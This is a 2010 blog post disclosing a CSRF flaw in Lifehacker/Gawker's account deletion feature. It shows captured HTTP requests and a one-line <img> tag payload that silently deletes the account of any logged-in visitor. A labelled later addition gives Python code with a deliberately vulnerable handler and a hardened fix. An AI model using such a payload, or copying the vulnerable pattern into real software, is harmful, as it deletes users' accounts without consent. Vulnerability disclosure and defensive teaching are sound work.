Posted by Vinnie Smegma on December 25th, 2010

Give Me One Line of HTML, and I'll Delete Your Gawker Account!

The Gawker hack left many of their users frustrated and angry.

The Aftermath of the Gawker Breach

Online communities across the internet have been quite astir this past month — from the never-ending controversy surrounding Wikileaks and the Distributed Denial of Service (DDoS) attacks against its detractors to allegations of government backdoors placed within the OpenBSD operating system; another high-profile security issue making its rounds through various online media outlets was that of the Gawker breach. Not only was Gawker Media's source code for their administrative backend and content management system stolen (and then later exposed), but their user database, which has been said to contain roughly 1.3 million accounts, was also leaked for public consumption. Given the relatively lax password policy, or lack thereof, employed by Gawker, 50% of the passwords were cracked within a short timeframe using only "John the Ripper" — a feat which has helped lead to a surge of hacked email accounts, an uptick in Twitter SPAM, and the defacement of numerous social networking profiles.

Less than one full week after the compromise of their network was made known to the public, Gawker's chief technology officer, Thomas Plunkett, wrote an email with his thoughts and resolutions on the matter, which was then distributed to each of the staff members. Mr. Plunkett explained, "Attention to completed work is every bit as important as attention to upcoming work. Our development efforts have been focused on new product while committing relatively little time to reviewing past work. This is often a fatal mistake in software development and was central to this vulnerability."

Admittedly I, Vinnie Smegma, have found Lifehacker, a subsidiary of the Gawker Media network, to be a personal favorite, though I've never posted a single comment nor created an account on their website. One of the more prominent complaints that has seemingly come to light in the wake of this fiasco, however, has been their members' contention over the inability to disable, remove, or even outright delete their accounts from Gawker's services. Only within the last few days has Gawker finally rolled out the changes necessary to allow its viewers to deactivate memberships through the use of the new account deletion feature; unfortunately this system is subject to abuse, is capable of deleting a third party's user account, and is able to do so without that individual's consent or notification.

Registering an Account on Lifehacker (Gawker Media)

Registering and creating a commenter account on Lifehacker, a website owned by Gawker Media.

Testing the new "Delete Account" Feature for Lifehacker

The new "Delete Account" button as it appears on the Lifehacker website.
Found on the "Lifehacker Compromised Commenting Accounts on Gawker Media FAQ" page, the new "Delete Account" button creates an HTTP GET request for the following URL:

http://lifehacker.com/me/#deleteuser

Lifehacker's Account Deletion Form...

Once the previous HTTP request has been completed, Gawker issues an account deletion form.

...and the Request Confirmation

Lifehacker/Gawker creates an additional prompt for final confirmation on account deletions.

The HTTP Requests Made for Deletion From Gawker

POST /?op=deleteuser HTTP/1.1
Host: lifehacker.com
User-Agent: (Removed)
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://lifehacker.com/me/
Content-Length: (Removed)
Cookie: (Removed)
Pragma: no-cache
Cache-Control: no-cache

username=(Removed)&id=(Removed)&formToken=(Removed)

Lifehacker's JSON Server Response

{"action":"setprofile","success":true,"id":"(REMOVED)","username":"(REMOVED)"}

Crafting a Simple Exploit to Delete Gawker Accounts

Gawker's "Delete Account" feature (such as the one found on Lifehacker) is vulnerable to a simple Cross-Site Request Forgery (CSRF or XSRF); this allows the function to be trivially exploited through various means, even with just a single line of HTML. The endpoint appears to perform no CSRF checks at all: the deletion goes through regardless of whether the HTTP request method is "GET" or "POST", no matter where the Referer header points, and without the formToken value that the site's own deletion form submits.

<img alt="Your Lifehacker Account Has Just Been Deleted If You're Logged In!" src="http://lifehacker.com/?op=deleteuser" />
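To show what the server side of this should look like, here is an added example (not code from the original post or from Gawker): a hypothetical Python handler for the deletion endpoint, first in the form the post describes (any method, formToken ignored) and then hardened so that a cross-site request like the one above is refused. The Request class, the SESSIONS store and the function names are constructed stand-ins for this illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field

@dataclass
class Request:  # minimal stand-in for an HTTP request (constructed for this example)
    method: str
    cookies: dict
    params: dict = field(default_factory=dict)   # query string or form body
    headers: dict = field(default_factory=dict)

SESSIONS = {}  # hypothetical session store: cookie -> account data + its CSRF token

def login(session_cookie, user_id, username):
    """Create a session and mint a per-session formToken; returns the token."""
    SESSIONS[session_cookie] = {"id": user_id, "username": username,
                                "formToken": secrets.token_urlsafe(32)}
    return SESSIONS[session_cookie]["formToken"]

def _deny(reason):
    return {"action": "setprofile", "success": False, "error": reason}

def _delete(cookie):
    sess = SESSIONS.pop(cookie)  # response mirrors the JSON shape shown in the post
    return {"action": "setprofile", "success": True,
            "id": sess["id"], "username": sess["username"]}

def delete_user_vulnerable(req):
    """Behaviour the post describes: any method, any referrer, formToken ignored.
    The session cookie alone authorises the deletion, so a cross-site <img>
    request that carries the victim's cookie succeeds."""
    cookie = req.cookies.get("session")
    return _delete(cookie) if cookie in SESSIONS else _deny("not logged in")

def delete_user_hardened(req):
    """Same endpoint with CSRF defences: POST only, the submitted formToken must
    match the token bound to this session (constant-time compare), and the
    X-Requested-With header must be present (defence in depth: a plain <img>
    or <form> request cannot set custom headers cross-origin)."""
    cookie = req.cookies.get("session")
    if cookie not in SESSIONS:
        return _deny("not logged in")
    if req.method != "POST":
        return _deny("method not allowed")
    if req.headers.get("X-Requested-With") != "XMLHttpRequest":
        return _deny("missing XHR header")
    expected = SESSIONS[cookie]["formToken"].encode()
    if not hmac.compare_digest(req.params.get("formToken", "").encode(), expected):
        return _deny("bad formToken")
    return _delete(cookie)
```

The token check is the primary control; the method and header checks only stop the trivial cases and would not be enough on their own.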